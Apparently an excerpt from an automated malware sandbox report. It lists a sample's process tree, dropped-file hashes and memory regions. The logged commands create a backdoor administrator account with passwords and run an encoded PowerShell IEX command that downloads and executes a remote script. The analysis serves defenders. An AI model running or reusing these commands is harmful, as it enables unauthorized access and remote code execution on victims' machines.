C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc DI6t4nmh1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc DI6t4nmh2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc DI6t4nmh3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Armario.vsdMD5
b166004bb483196fdfed1ff529fbab5d
SHA18791d9f6c24f2c0ceb1890a122ba963cbd000bb4
SHA256f226f152d6028727a02b0e53270ffe84de977820cbf8e7ef88ed92e84d93dd6e
SHA5121b70385424124cc43970236dee9ca2b820ea67aa14241e76b131def1eeea5e86f727e7aec32685a7e84e2d292c8641ccca40f86ac61e32f26ace25018f8532fd
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Che.vsdMD5
22cf0f40a76342274fc11807e9bf11f8
SHA14ae2b8e887b09d6bdb1ea8b2a69787d86c5f6c3a
SHA25622cae1b1a1b5e82652921b6860e3cf9e3244b41faee4abfae287d84867e2cb2a
SHA5120d8079c4f32688e9f72473982d415d848995d797b6b144f092011073c1fd63853a078a8f470f0da9083bd4900718c05ece672e96cc67f33ae745d2982a22a628
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\DMD5
b166004bb483196fdfed1ff529fbab5d
SHA18791d9f6c24f2c0ceb1890a122ba963cbd000bb4
SHA256f226f152d6028727a02b0e53270ffe84de977820cbf8e7ef88ed92e84d93dd6e
SHA5121b70385424124cc43970236dee9ca2b820ea67aa14241e76b131def1eeea5e86f727e7aec32685a7e84e2d292c8641ccca40f86ac61e32f26ace25018f8532fd
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Poi.vsdMD5
6a0c13b3b8039e95c808cfb008f26b4b
SHA166e719e05c0bdb69a9f95dfdc1a54d626c9eb667
SHA256158d9b907399f5b5da7decd462a704cd44c03f3bad934271ba1e2164b1230377
SHA51244576ecc0673958d46efd1417042e6141e6ebab1516414736b5d171153a9a068e0e0e52c942fba09b886ff5e11a88f53f434ecf42b9e6c33c192c6efb56fc9fc
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Veduto.vsdMD5
3c2f37a9838a0b5aa9fb0986ecba0d11
SHA1b06377a345b2a7527063b3d0405ee50bbf7c1433
SHA256b0b36c48206e2662c9aaca05b8e03f3378cf1052c383fda02a793d1277a71f93
SHA512cd0189a87ff971e392d3f7811c77fc8ec68424056060bd72d4ca924723955565ab07e377a142c8a5265cbb80274de353ca3e5d27194d272393794105306678ce
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\RESAD38.tmpMD5
f4f91cafe2b46c219327deaa4b5873d1
SHA1db21216dc794bcaf72beeb0e3567d70b5c6e8c01
SHA256c830c58b82e39d0dc261a4258530cbdbd543f2da8106288f315f08323c0c0c5d
SHA51266044f29384e8f57ca9b39056e0bea0cde2c58379dd8dfeeb14a458be766a745afb1be38c47ed9d12a7882cc18b6ea406ebef1306653382218926e23dd21ea25
-
C:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.dllMD5
c64073d64020cd05932222f7fdcbd515
SHA145a9a1fbcc082c745b5f0af85e20d99dd2ea4f62
SHA256c64f26fad939e3b59c19827fe3ad3d1b04ac54ccdf0f2b1b419033671984d18c
SHA51216c74f673698dbcc21f7ce471168ce33767449b10b5316664c63ee2caf60d9c495c2e6619cb0ea7a8e4e33d08893b9a580d46a23ce895f73d154130db6638062
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\CSC3358E928C6584838BD4D118D3AA38383.TMPMD5
bcbe07eee0efc7deed201f89b9792453
SHA1872dee314db6d5f2fcacb5eff113c01a65ae1ad7
SHA2565350d5afd9489daf37802fa369a301c392d9bbe0e37777fead2c524426da4703
SHA51233085749dd9be3e90ed030425fe2b188fe0466cc55d2cd306d3d5f20b5074b25bc4ad88bbcc831b4efc8db0eb0c0de224876f22fd99cc85069e44a822a6c82a6
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.cmdlineMD5
a022555ed6b40311c3a3dff84c00ba55
SHA192279ed1eaf6a178a7e40f35e478cf889b2333e6
SHA2560232efa937e1fed4224678d024457378bfcdc3363c8b40b5771501af6366b330
SHA5122bdadcc6ff58d1bc124fad41c4d36971b675f674ffe0ac0fb9e958a992873b4d14897b84c2e44a4cd157b8ef24d2d3b3a9e8b8aa469a29b265c1d5180afa4f1c
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/60-117-0x0000000000000000-mapping.dmp
-
memory/196-264-0x0000000000000000-mapping.dmp
-
memory/492-251-0x0000000000000000-mapping.dmp
-
memory/776-233-0x0000000000000000-mapping.dmp
-
memory/816-128-0x000001FBCCB10000-0x000001FBCD166000-memory.dmpFilesize
6.3MB
-
memory/816-136-0x000001FBF4CB6000-0x000001FBF4CB7000-memory.dmpFilesize
4KB
-
memory/816-135-0x000001FBF4CB5000-0x000001FBF4CB6000-memory.dmpFilesize
4KB
-
memory/816-134-0x000001FBF4CB3000-0x000001FBF4CB5000-memory.dmpFilesize
8KB
-
memory/816-133-0x000001FBF4CB0000-0x000001FBF4CB2000-memory.dmpFilesize
8KB
-
memory/816-131-0x000001FBCCB10000-0x000001FBCD166000-memory.dmpFilesize
6.3MB
-
memory/816-130-0x000001FBF50F0000-0x000001FBF5511000-memory.dmpFilesize
4.1MB
-
memory/1276-144-0x00000216C9FF0000-0x00000216C9FF1000-memory.dmpFilesize
4KB
-
memory/1276-174-0x00000216CB520000-0x00000216CB521000-memory.dmpFilesize
4KB
-
memory/1276-158-0x00000216CA066000-0x00000216CA068000-memory.dmpFilesize
8KB
-
memory/1276-150-0x00000216CAD40000-0x00000216CAD41000-memory.dmpFilesize
4KB
-
memory/1276-175-0x00000216CA068000-0x00000216CA069000-memory.dmpFilesize
4KB
-
memory/1276-149-0x00000216CA063000-0x00000216CA065000-memory.dmpFilesize
8KB
-
memory/1276-147-0x00000216CA060000-0x00000216CA062000-memory.dmpFilesize
8KB
-
memory/1276-173-0x00000216CB190000-0x00000216CB191000-memory.dmpFilesize
4KB
-
memory/1276-166-0x00000216CA040000-0x00000216CA041000-memory.dmpFilesize
4KB
-
memory/1276-137-0x0000000000000000-mapping.dmp
-
memory/1340-229-0x0000000000000000-mapping.dmp
-
memory/2096-253-0x0000000000000000-mapping.dmp
-
memory/2300-224-0x0000027E5EC46000-0x0000027E5EC48000-memory.dmpFilesize
8KB
-
memory/2300-220-0x0000000000000000-mapping.dmp
-
memory/2300-225-0x0000027E5EC48000-0x0000027E5EC4A000-memory.dmpFilesize
8KB
-
memory/2300-223-0x0000027E5EC43000-0x0000027E5EC45000-memory.dmpFilesize
8KB
-
memory/2300-222-0x0000027E5EC40000-0x0000027E5EC42000-memory.dmpFilesize
8KB
-
memory/2616-159-0x0000000000000000-mapping.dmp
-
memory/2680-162-0x0000000000000000-mapping.dmp
-
memory/2724-254-0x0000000000000000-mapping.dmp
-
memory/2824-255-0x0000000000000000-mapping.dmp
-
memory/3032-235-0x0000000000000000-mapping.dmp
-
memory/3036-116-0x0000000000000000-mapping.dmp
-
memory/3236-236-0x0000000000000000-mapping.dmp
-
memory/3364-249-0x0000000000000000-mapping.dmp
-
memory/3440-230-0x0000000000000000-mapping.dmp
-
memory/3564-231-0x0000000000000000-mapping.dmp
-
memory/3596-232-0x0000000000000000-mapping.dmp
-
memory/3612-248-0x0000000000000000-mapping.dmp
-
memory/3676-114-0x0000000000000000-mapping.dmp
-
memory/3684-245-0x0000000000000000-mapping.dmp
-
memory/3828-246-0x0000000000000000-mapping.dmp
-
memory/3848-256-0x0000000000000000-mapping.dmp
-
memory/3848-260-0x0000020202F78000-0x0000020202F79000-memory.dmpFilesize
4KB
-
memory/3848-259-0x0000020202F76000-0x0000020202F78000-memory.dmpFilesize
8KB
-
memory/3848-258-0x0000020202F73000-0x0000020202F75000-memory.dmpFilesize
8KB
-
memory/3848-257-0x0000020202F70000-0x0000020202F72000-memory.dmpFilesize
8KB
-
memory/3888-127-0x00000264709C0000-0x00000264709C1000-memory.dmpFilesize
4KB
-
memory/3888-252-0x0000000000000000-mapping.dmp
-
memory/3888-124-0x0000000000000000-mapping.dmp
-
memory/3952-226-0x0000000000000000-mapping.dmp
-
memory/4016-261-0x0000000000000000-mapping.dmp
-
memory/4024-182-0x0000000000000000-mapping.dmp
-
memory/4024-217-0x000002710A738000-0x000002710A73A000-memory.dmpFilesize
8KB
-
memory/4024-196-0x000002710A733000-0x000002710A735000-memory.dmpFilesize
8KB
-
memory/4024-195-0x000002710A730000-0x000002710A732000-memory.dmpFilesize
8KB
-
memory/4024-199-0x000002710A736000-0x000002710A738000-memory.dmpFilesize
8KB
-
memory/4168-243-0x0000000000000000-mapping.dmp
-
memory/4188-244-0x0000000000000000-mapping.dmp
-
memory/4220-234-0x0000000000000000-mapping.dmp
-
memory/4256-120-0x0000000000000000-mapping.dmp
-
memory/4256-237-0x0000000000000000-mapping.dmp
-
memory/4276-122-0x0000000000000000-mapping.dmp
-
memory/4324-263-0x0000000000000000-mapping.dmp
-
memory/4384-262-0x0000000000000000-mapping.dmp
-
memory/4604-219-0x00000287380A3000-0x00000287380A5000-memory.dmpFilesize
8KB
-
memory/4604-216-0x0000000000000000-mapping.dmp
-
memory/4604-218-0x00000287380A0000-0x00000287380A2000-memory.dmpFilesize
8KB
-
memory/4604-221-0x00000287380A6000-0x00000287380A8000-memory.dmpFilesize
8KB
-
memory/4672-242-0x0000000000000000-mapping.dmp
-
memory/4724-241-0x0000000000000000-mapping.dmp
-
memory/4736-250-0x0000000000000000-mapping.dmp
-
memory/4892-227-0x0000000000000000-mapping.dmp
-
memory/4956-247-0x0000000000000000-mapping.dmp
-
memory/4980-228-0x0000000000000000-mapping.dmp
-
memory/5012-238-0x0000000000000000-mapping.dmp